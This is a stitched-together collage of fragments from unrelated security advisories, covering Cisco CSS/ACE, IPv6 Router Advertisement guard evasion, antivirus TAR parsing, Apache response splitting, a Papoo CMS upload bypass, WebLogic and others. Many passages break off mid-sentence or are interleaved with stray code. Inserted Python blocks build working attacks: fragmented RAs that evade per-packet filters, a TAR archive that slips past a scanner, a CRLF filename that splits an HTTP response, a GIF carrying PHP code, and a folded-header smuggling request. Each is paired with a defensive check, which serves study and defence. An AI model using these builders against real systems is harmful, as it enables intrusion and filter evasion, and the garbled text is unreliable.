Security Advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header
Manipulation Vulnerabilities
Release Date: 2010-07-02
Application: Cisco Content Services Switch (CSS) / ACE Products
Versions: Cisco CSS 11500 - 08.20.1.01
Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5)]
#include <netinet/ip.h>
/* BSD */
#define _BSD
/* Header sizes */
#define IP_HDR_SIZE 20
#define GRE_HDR_SIZE 4
#define GRE_KEY_SIZE 4
#define NHRP_HDR_SIZE 62
Attack:
=======
Make the evil Router Advertisement fragmented and put the ICMPv6 header into
the second fragment, e.g. by placing a very large Destination Options
extension header before the ICMPv6 part.
So the packets look like:
Fragment 1:
IPv6 Header
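The evasion described above, as an added example that is not part of the original advisory or of the tool it describes: a builder for the two fragments (an oversized Destination Options header split across them, with the Router Advertisement only in the second), next to a per-packet header walker that models a simplistic RA guard and a reassembling check that finds the RA. The addresses, fragment identification and option sizes are constructed for the demonstration.

```python
import struct

IPPROTO_ICMPV6, IPV6_DESTOPTS, IPV6_FRAGMENT = 58, 60, 44
ND_ROUTER_ADVERT = 134
# Constructed addresses: a link-local "router" and the all-nodes multicast group.
SRC = bytes.fromhex("fe800000000000000000000000000001")
DST = bytes.fromhex("ff020000000000000000000000000001")


def checksum(data):
    """RFC 1071 one's-complement checksum."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return ~s & 0xFFFF


def router_advertisement():
    """16-byte ICMPv6 RA (type 134) with a valid checksum over the IPv6 pseudo-header."""
    body = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0)
    pseudo = SRC + DST + struct.pack("!I3xB", len(body), IPPROTO_ICMPV6)
    return body[:2] + struct.pack("!H", checksum(pseudo + body)) + body[4:]


def dest_options(total_len, next_header):
    """Destination Options header of total_len bytes (multiple of 8), padded with Pad1 options."""
    assert total_len % 8 == 0 and total_len <= 2048
    return struct.pack("!BB", next_header, total_len // 8 - 1) + b"\x00" * (total_len - 2)


def ipv6(payload, next_header, hop_limit=255):
    return struct.pack("!IHBB", 0x60000000, len(payload), next_header, hop_limit) + SRC + DST + payload


def fragment_header(next_header, offset_bytes, more, ident):
    return struct.pack("!BBHI", next_header, 0, ((offset_bytes // 8) << 3) | int(more), ident)


def build_fragments(destopts_len=1024, split=512, ident=0xABCD):
    """Two fragments: the first carries only part of the oversized Destination Options header,
    the second carries its remainder plus the ICMPv6 RA, so no single fragment contains type 134."""
    fragmentable = dest_options(destopts_len, IPPROTO_ICMPV6) + router_advertisement()
    first = fragment_header(IPV6_DESTOPTS, 0, True, ident) + fragmentable[:split]
    second = fragment_header(IPV6_DESTOPTS, split, False, ident) + fragmentable[split:]
    return [ipv6(first, IPV6_FRAGMENT), ipv6(second, IPV6_FRAGMENT)]


def icmp_type_no_reassembly(pkt):
    """Walk the extension-header chain of one packet, as a per-packet RA-guard filter would.
    Returns the ICMPv6 type, or None when the upper-layer header is not inside this packet."""
    nh, off = pkt[6], 40
    while True:
        if nh == IPPROTO_ICMPV6:
            return pkt[off] if off < len(pkt) else None
        if nh == IPV6_FRAGMENT:
            if off + 8 > len(pkt):
                return None
            if struct.unpack("!H", pkt[off + 2:off + 4])[0] >> 3:
                return None            # non-first fragment: upper-layer header lives elsewhere
            nh, off = pkt[off], off + 8
        elif nh in (0, 43, 60):        # hop-by-hop, routing, destination options
            if off + 2 > len(pkt):
                return None
            nh, off = pkt[off], off + (pkt[off + 1] + 1) * 8
        else:
            return None


def icmp_type_with_reassembly(frags):
    """Reassemble the fragmentable part (RFC 2460 style) and classify the whole datagram."""
    pieces, nh = {}, None
    for pkt in frags:
        nh, _, off_flags, _ = struct.unpack("!BBHI", pkt[40:48])
        pieces[(off_flags >> 3) * 8] = pkt[48:]
    return icmp_type_no_reassembly(ipv6(b"".join(pieces[k] for k in sorted(pieces)), nh))


if __name__ == "__main__":
    frags = build_fragments()
    print([icmp_type_no_reassembly(p) for p in frags])   # [None, None]: per-packet filter sees no RA
    print(icmp_type_with_reassembly(frags))               # 134: the RA is there after reassembly
```

The check a practitioner wants from this is the second function: a filter that classifies each packet on its own cannot see the RA in either fragment, while anything that reassembles first (or simply drops fragmented ND traffic, as RFC 6980 later recommends) does.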
Summary:
A) Prelude to the vulnerabilities
B) Cross Site Scripting
C) HTTP Response Header Injection
D) HTTP Response Splitting
A) Prelude to the vulnerabilities
What follows is the code used to validate the user input:
current implementation. Microsoft decided to filter "Type 1 XSS", that is,
free text sent to the server and reflected back to the user, thereby
injecting HTML code into the website's page. They chose not to handle
certain situations, such as injection into a JavaScript context, which
would be extremely difficult to filter. The software giant also chose not
to filter injection into HTTP headers, which will drive attackers to focus on
discovering CRLF vulnerabilities.
A quote of Microsoft's Anti-XSS filter design philosophy:
<<<
"Like all security mitigation and protection technologies, the XSS Filter's
such attacks.
I Introduction
====================================================
MIME or Content-Type sniffing[1] is standard browser functionality for finding
an appropriate way to render data when the HTTP headers sent by the server are
either inconclusive or missing. Internet Explorer in particular is known to
use this technique even in cases where the server sends a specific
Content-Type header[2].
Internet Explorer resorts to MIME sniffing when either the
Content-Type header and
TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004
CVE no -
CVE-2012-1456
39. If the length (size) field in the TAR header of a file containing the
EICAR test string is set greater than the archive's total length
(1,000,000 + original length in our experiments), the antivirus declares
the file to be clean, but the file is still extracted correctly by the GNU
tar program.
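A worked model of item 39, added here and not part of the original report or of either product's code: a ustar header builder whose size field can be inflated, next to a scanner that trusts the size field (and therefore gives up on a member that runs past the end of the archive) and an extractor that writes out whatever bytes are present. The two tools are models of the behaviours the report describes, not TrendMicro's or GNU tar's code, and the marker string stands in for EICAR.

```python
MARKER = b"X-CONSTRUCTED-TEST-SIGNATURE-NOT-A-REAL-VIRUS"   # constructed stand-in for the EICAR string


def tar_header(name, size):
    """512-byte ustar header; `size` is whatever we claim, not necessarily the real length."""
    fields = [name.encode().ljust(100, b"\0"), b"0000644\0", b"0000000\0", b"0000000\0",
              b"%011o\0" % size, b"00000000000\0", b"        ", b"0", b"\0" * 100,
              b"ustar\0", b"00", b"\0" * 32, b"\0" * 32, b"0000000\0", b"0000000\0", b"\0" * 155]
    hdr = b"".join(fields).ljust(512, b"\0")
    # Checksum is computed with the checksum field set to spaces, then written as 6 octal digits, NUL, space.
    return hdr[:148] + b"%06o\0 " % sum(hdr) + hdr[156:]


def make_tar(name, data, declared_size=None):
    """One-member archive; declared_size lets the header lie about the member length."""
    size = len(data) if declared_size is None else declared_size
    return tar_header(name, size) + data + b"\0" * (-len(data) % 512) + b"\0" * 1024


def member_size(hdr):
    return int(hdr[124:136].rstrip(b"\0 "), 8)


def strict_scan(archive, signature):
    """Models a scanner that trusts the size field: a member whose declared size runs past the
    end of the archive is treated as unreadable and skipped, so the archive is reported clean."""
    pos, hits = 0, []
    while pos + 512 <= len(archive) and archive[pos:pos + 512] != b"\0" * 512:
        hdr = archive[pos:pos + 512]
        size = member_size(hdr)
        end = pos + 512 + size
        if end > len(archive):
            break                                   # "truncated" member: nothing gets scanned
        if signature in archive[pos + 512:end]:
            hits.append(hdr[:100].rstrip(b"\0").decode())
        pos = end + (-size % 512)
    return hits


def lenient_extract(archive):
    """Models an extractor that writes out whatever bytes of the member are actually present."""
    hdr = archive[:512]
    data = archive[512:512 + member_size(hdr)]      # slicing past the end returns what exists
    return hdr[:100].rstrip(b"\0").decode(), data.rstrip(b"\0")


if __name__ == "__main__":
    honest = make_tar("eicar.com", MARKER)
    evil = make_tar("eicar.com", MARKER, declared_size=1_000_000 + len(MARKER))
    print(strict_scan(honest, MARKER), strict_scan(evil, MARKER))   # ['eicar.com'] []
    print(lenient_extract(evil))                                     # ('eicar.com', MARKER)
```

The divergence is the whole bug: whenever the scanner's parser is stricter than the extractor's, the attacker only has to produce an archive the scanner refuses to read but the extractor still unpacks. The fix on the scanning side is to scan the bytes that are present (as the extractor will) rather than to skip a member because its header is inconsistent.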
response and '300 Multiple Choices' message body.
This could lead to XSS if the name of the file is controlled by an
attacker (e.g. by previously uploading it).
Moreover, as the list of filenames is also sent, without being
sanitized, in the response header, it could result in an HTTP Response
Splitting [1] issue if the name of the file contains '\n' (Line Feed).
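The response header injection and response splitting described here, as an added example that is not code from the advisory or from Apache: a response builder that copies attacker-controlled filenames into an Alternates header (the vulnerable pattern) beside the same builder with CR/LF rejection, and a lenient client-side parser that shows the second, attacker-authored response appearing in the stream. The same builder models the other header-injection cases on this page (a Content-Disposition or Set-Cookie header built from unfiltered input); the filename, header layout and injected body are constructed for the demonstration.

```python
import re

INJECTED = b"<script>alert(1)</script>"   # constructed body of the attacker's second response (25 bytes)


def build_response(status, headers, body, strict=False):
    """Assemble an HTTP response. strict=False writes header values verbatim (the vulnerable
    pattern); strict=True refuses any header name or value containing CR, LF or NUL."""
    if strict:
        for name, value in headers:
            if re.search(r"[\r\n\x00]", name + value):
                raise ValueError("header injection attempt in %r" % name)
    head = ["HTTP/1.1 " + status] + ["%s: %s" % (name, value) for name, value in headers]
    return ("\r\n".join(head) + "\r\n\r\n").encode("latin-1") + body


def listing_response(filenames, strict=False):
    """Models the mod_negotiation case: filenames are echoed both in an Alternates header
    and in the 300 Multiple Choices body."""
    body = ("<ul>" + "".join("<li>%s</li>" % f for f in filenames) + "</ul>").encode("latin-1")
    headers = [("Content-Type", "text/html"),
               ("Alternates", ", ".join('{"%s" 1}' % f for f in filenames)),
               ("Content-Length", str(len(body)))]
    return build_response("300 Multiple Choices", headers, body, strict)


def rejects(filenames):
    """True when the strict builder refuses to emit a response for these filenames."""
    try:
        listing_response(filenames, strict=True)
        return False
    except ValueError:
        return True


def parse_responses(stream):
    """Lenient client-side parser: splits on LF, tolerates a missing CR, honours Content-Length,
    and keeps reading further responses while bytes remain (this is how a split becomes visible)."""
    responses = []
    while stream:
        status, headers = None, {}
        while stream:
            line, _, stream = stream.partition(b"\n")
            line = line.rstrip(b"\r")
            if status is None:
                status = line.decode("latin-1")
            elif not line:
                break
            else:
                name, _, value = line.decode("latin-1").partition(":")
                headers[name.strip().lower()] = value.strip()
        n = int(headers.get("content-length", len(stream)))
        responses.append((status, headers, stream[:n]))
        stream = stream[n:]
    return responses


# A filename that is legal on disk but terminates the real header block with a bare LF and
# starts a second, attacker-authored response.
EVIL_NAME = ('x" 1}\nContent-Length: 0\n\nHTTP/1.1 200 OK\nContent-Type: text/html\n'
             'Content-Length: %d\n\n' % len(INJECTED)) + INJECTED.decode("latin-1")


if __name__ == "__main__":
    for status, _, body in parse_responses(listing_response(["a.html", EVIL_NAME])):
        print(status, body[:40])
    print(rejects(["a.html", EVIL_NAME]))   # True: strict builder refuses the filename
```

Rejecting CR/LF (or percent-encoding the value) at the point where a header is assembled is the one fix that covers every header at once; filtering only the filename at upload time leaves every other path by which a name can reach a header unprotected.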
[ Analysis ]
RFC 3173 IP Payload Compression, henceforth ipcomp, is a protocol intended to
provide compression of IP datagrams, and is commonly used alongside IPsec
(although there is no requirement to do so).
An ipcomp datagram consists of an IP header with ip->ip_p set to 108
(IPPROTO_COMP), followed by a 32-bit ipcomp header, described in C syntax below.
struct ipcomp {
    uint8_t  comp_nxt;   // Next Header
    uint8_t  comp_flags; // Reserved, must be zero
    uint16_t comp_cpi;   // Compression Parameter Index (RFC 3173, section 2)
};
Risk factor: N/A
The reason we did not consider this vulnerability a security risk is that the attacker needs to force the victim's browser to submit a malformed HTTP method.
Header injection has been demonstrated to be possible using Flash [1] [2], but may depend on vulnerable Flash plugins.
A relevant example published in the past is the exploitation of the Apache 'Expect' XSS [3] (CVE-2006-3918) using Flash [4].
In this case, however, the HTTP method itself needs to be spoofed to a specially crafted value.
Besides many other applications the CFNetwork framework is used by
Safari and Mail.
Description:
A remotely exploitable vulnerability has been found in the HTTP header
parsing code. Each HTTP header received from a web server is first
capitalized: the first character of the header name is upper-cased
while all remaining characters are lower-cased. Inside the CFNetwork
framework the _CFCapitalizeHeader() function is used for this purpose.
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* phpsploit is a class implementing a web user agent.
* You can add cookies and headers, and use a proxy server with (or without)
* basic authentication. It supports the GET and POST methods. It can
* also be used as a browser with the cookiejar() function (which allows
* a server to set several cookies for the next requests) and the
* allowredirection() function (which allows the script to follow all
* redirections sent by the server). It can return the content (or the
- -----/
According to the .MBM format [3], the structure of an MBM is the
following (beginning with a Header Section):
/-----
Offset Size Data Description
0000 ID 37 00 00 10 UID1: Header Section layout
It is possible to obtain the username and password from the "Proxy-Authorization" header, which is not correctly removed from the forwarded request when WMP sends it.
Requirements:
- IWSVA/IWSS basic authorization enabled
- Client is using WMP (8-11) as video player
- Standalone proxy (if an upstream proxy is used, the "Proxy-Authorization" header is removed by that upstream proxy)
Bug:
- ----------------------
Over the last several years, VSR analysts have observed unusual behavior
in multiple WebLogic deployments when certain special characters were
URL-encoded and appended to URLs. In late April 2010, VSR began
researching this in more depth and found that the issue could allow
HTTP header injection and HTTP request smuggling attacks.
Product Background
- ------------------
WebLogic application server is commonly deployed in a three-tier
+++ lib/webrick/httprequest.rb (working copy)
@@ -267,9 +267,5 @@ module WEBrick
end
end
- begin
- @header = HTTPUtils::parse_header(@raw_header.join)
- rescue => ex
- raise HTTPStatus::BadRequest, ex.message
- end
+ @header = HTTPUtils::parse_header(@raw_header.join)
end
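Review bot: dropping the begin/rescue around HTTPUtils::parse_header means that a header block which fails to parse now propagates the parser's own exception instead of HTTPStatus::BadRequest, so a malformed request header will be answered with a generic server error rather than a 400 unless a caller converts it. If the caller now handles this, say so in the commit message; otherwise keep the rescue, or narrow it to the specific exception class if the blanket `rescue => ex` was the problem.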
from the data images, handling virtual machines' hard drives and so on.
The first vulnerability - Denial of Service - exists in the FAT image
handling function (mainly diskette image files are able to cause this kind
of application hang, but it is also possible that header modification of
other image formats leads to the same program behaviour).
The successful DoS attack is achieved by opening a special .IMG
file with a modified header. Because of bad FAT header handling,
the application may enter an infinite loop, and the only way out
is to terminate the process.
=======================
Affects most web application platforms, including Java, .NET, PHP and
ColdFusion.
This attack involves the use of header injection, particularly the
Content-Disposition header, to subvert HTTP responses from trusted
domains. Attackers can use this technique to inject a malicious file
download with an arbitrary filename (.html, .exe, .swf, .mov, .msi,
.vbs, etc...) and arbitrary file content. Since the attack subverts an
existing HTTP request, both the URL and the downloaded file use a
Permalink:
http://www.mindedsecurity.com/MSA01240108.html
[ Summary ]
Internet Explorer 7 allows setting the header "Transfer-Encoding:
chunked" via setRequestHeader, exposing the browser to HTTP Request
Splitting/Smuggling attacks.
[ Analysis ]
remote code execution. However, further investigation into the
vulnerability revealed that it can only be triggered if the administrator
has not only activated transparent cookie encryption, but also
explicitly disabled several other security features of Suhosin.
In addition, remote exploitation requires a PHP application
that puts unfiltered user input into a call to the header()
function that sends a Set-Cookie header.
Furthermore, most modern Unix systems compile the Suhosin extension
with the FORTIFY_SOURCE flag, which detects the possible buffer
overflow and aborts execution before anything bad can happen.
The version of an HTTP message is indicated by an HTTP-Version field
in the first line of the message.
HTTP-Version = "HTTP" "/" 1*DIGIT "." 1*DIGIT
HTTP/1.1 header field values can be folded onto multiple lines if the
continuation line begins with a space or horizontal tab. All linear
white space, including folding, has the same semantics as SP. A
recipient MAY replace any linear white space with a single SP before
interpreting the field value or forwarding the message downstream.
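Header folding is one of the places where two HTTP parsers in the same request path can legitimately disagree, which is the precondition for the request smuggling attacks mentioned elsewhere on this page. The following is an added example, not code from any of the advisories quoted here: a header parser with folding switched on or off, and a framing function that shows the two parsers choosing different body lengths for the same constructed request.

```python
def parse_header_block(block, unfold):
    """Parse the header lines of a request (everything after the request line, before the blank line).
    unfold=True joins continuation lines that begin with SP/HTAB onto the previous field, as RFC 2616
    permits; unfold=False treats such lines as malformed and ignores them."""
    fields = []
    for line in block.split("\r\n"):
        if not line:
            continue
        if line[0] in " \t":
            if unfold and fields:
                name, value = fields[-1]
                fields[-1] = (name, (value + " " + line.strip()).strip())
            continue
        name, _, value = line.partition(":")
        fields.append((name.strip().lower(), value.strip()))
    return dict(fields)


def framing(raw_request, unfold):
    """Return how a parser decides the body length: ('chunked', None) or ('content-length', n)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    _request_line, _, block = head.partition("\r\n")
    h = parse_header_block(block, unfold)
    if "chunked" in h.get("transfer-encoding", "").lower():
        return ("chunked", None)          # RFC 2616 4.4: Transfer-Encoding wins over Content-Length
    return ("content-length", int(h.get("content-length", "0")))


# Constructed request: the value of Transfer-Encoding is folded onto a continuation line.
FOLDED_REQUEST = ("POST /upload HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\n"
                  "Transfer-Encoding:\r\n chunked\r\n\r\n0\r\n\r\n")


def disagree(raw_request):
    """True when an unfolding and a non-unfolding parser frame the same request differently:
    that disagreement between a front-end and a back-end is the request smuggling condition."""
    return framing(raw_request, True) != framing(raw_request, False)


if __name__ == "__main__":
    print(framing(FOLDED_REQUEST, unfold=True))    # ('chunked', None)
    print(framing(FOLDED_REQUEST, unfold=False))   # ('content-length', 5)
    print(disagree(FOLDED_REQUEST))                # True
```

A proxy that wants to stay safe here should either normalize folded fields to a single line before forwarding (the "MAY replace" above) or reject obs-fold outright, and should never forward a request carrying both Content-Length and Transfer-Encoding unchanged.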
I want to warn you about a Cross-Site Scripting vulnerability in Mozilla,
Firefox and Chrome.
Some time ago Mozilla fixed a vulnerability in Firefox described in MFSA
2009-22 (http://www.mozilla.org/security/announce/2009/mfsa2009-22.html),
which allowed the Refresh header to redirect to javascript: URIs.
This vulnerability was fixed in Firefox 3.0.9. And recently, on 06.07.2009, I
found a way to bypass this protection in Firefox. This method of
XSS attack also works in Mozilla (1.7.x) and Chrome.
netVigilance Security Advisory #68
SimpNews version 2.41.03 Multiple Path Disclosure Vulnerabilities
Description:
SimpNews is a news system written in PHP. Features: data stored in MySQL, admin interface, support for multiple languages, support for multiple instances in one database, own header, multiple layout settings, support for BBCode and smilies, you can assign an icon graphic to every news entry, you can attach a file to news entries, entries can be put in categories, users can subscribe to get news sent by email, search entries, users can post comments on news entries, event calendar, newsticker, option to let users propose news entries.
External References:
Mitre CVE: CVE-2007-4872
NVD NIST: CVE-2007-4872
OSVDB: ID requested but no answer received
        // continue on as this is okay
    }
    elseif (( false === isset( $_COOKIE[$gFolderName] )) ||
            ( $theChecksum !== $_COOKIE[$gFolderName] ))
    {
        header( "Location: /mailbox/pin.php?" . NAME_KEY .
                "=" . $gFolderName ); exit;
    }
Vulnerability 2: Authentication not validated
Advisory: Papoo CMS: Authenticated Arbitrary Code Execution
The Papoo CMS allows authenticated users to upload GIF, JPG and PNG images
if they have the "upload images" privilege, which is true for all default
groups that can access the administrative interface. The CMS checks the
uploaded images only for their header, but not for the file extension. It
is therefore possible to upload images with the file extension ".php" and
a valid image header. By embedding PHP code into the image (e.g. by using
the GIF comments field), arbitrary code can be executed when requesting
the image.
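The upload bypass described in this advisory, as an added example that is not Papoo's code or part of the advisory: a builder for a small GIF89a whose Comment Extension block carries a PHP payload, the header-only check that accepts it, and a hardened check that enforces an extension allow-list, requires the signature to match the extension, and refuses a PHP open tag anywhere in the body. The payload string and the image bytes are constructed for the demonstration.

```python
import re

PHP_PAYLOAD = b"<?php echo 'constructed demo payload'; ?>"   # stands in for a real web shell


def gif_with_comment(comment):
    """Minimal 1x1 GIF89a with `comment` stored in a Comment Extension (0x21 0xFE) block."""
    header = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00\x00\x00\xff\xff\xff"   # LSD + 2-colour GCT
    chunks = [comment[i:i + 255] for i in range(0, len(comment), 255)]             # 255-byte sub-blocks
    comment_ext = b"\x21\xfe" + b"".join(bytes([len(c)]) + c for c in chunks) + b"\x00"
    image = b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b"   # descriptor, data, trailer
    return header + comment_ext + image


def read_gif_comment(data):
    """Return the first Comment Extension's payload, or None (shows the payload survives intact)."""
    i = data.find(b"\x21\xfe")
    if i < 0:
        return None
    i, out = i + 2, b""
    while data[i]:
        out, i = out + data[i + 1:i + 1 + data[i]], i + 1 + data[i]
    return out


SIGNATURES = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG\r\n\x1a\n",),
              ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",)}


def header_only_check(data):
    """The vulnerable check: accept anything whose leading bytes match a known image signature."""
    return any(data.startswith(s) for sigs in SIGNATURES.values() for s in sigs)


def hardened_check(filename, data):
    """Extension allow-list, a signature that matches that extension, and no PHP open tag anywhere."""
    ext = ("." + filename.rsplit(".", 1)[1].lower()) if "." in filename else ""
    if ext not in SIGNATURES or not any(data.startswith(s) for s in SIGNATURES[ext]):
        return False
    return re.search(rb"<\?", data) is None


if __name__ == "__main__":
    polyglot = gif_with_comment(PHP_PAYLOAD)
    print(header_only_check(polyglot))                 # True: looks like a GIF
    print(read_gif_comment(polyglot) == PHP_PAYLOAD)   # True: payload intact inside the image
    print(hardened_check("shell.php", polyglot))       # False: extension not allowed
    print(hardened_check("shell.gif", polyglot))       # False: PHP open tag in the body
    print(hardened_check("pic.gif", gif_with_comment(b"holiday")))   # True
```

Even with this check, store uploads under a server-generated name in a directory where script execution is disabled: a name like "pic.php.gif" passes the extension test, and some Apache configurations will still hand such a file to the PHP handler.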
or ASSIGNED by using the XML-RPC interface.
* When viewing several bugs at once, there was a Cross-Site Scripting hole.
* The inbound email interface allowed you to set the Reporter via the
text of the email, instead of just using the From header.
All affected installations are encouraged to upgrade as soon as possible.
Vulnerability Details
=====================
use Getopt::Long;
sub header
{
print "
****************************************************
* Easyecards 310a Exploit *
****************************************************
.- file /usr/share/spamassassin/72_active.cf
replace :
header FH_DATE_PAST_20XX Date =~ /20[1-9][0-9]/ [if-unset: 2006]
by:
header FH_DATE_PAST_20XX Date =~ /20[2-9][0-9]/ [if-unset: 2006]
use Getopt::Long;
sub header
{
print "
****************************************************
* Easydynamicpages 30tr Exploit *
****************************************************
File/Function/line : webserver.c/ws_decodepassword/1399
Cause: NULL pointer dereference. The 'header' pointer is incremented
without a bounds check until a space character is encountered. If no
space character is found, the pointer is incremented and dereferenced
until out-of-bounds memory is hit. Whether this is exploitable depends on
the state of memory at the time, so the exploit repeatedly sends an
Authorization header with no data until a crash occurs. This typically
takes only seconds.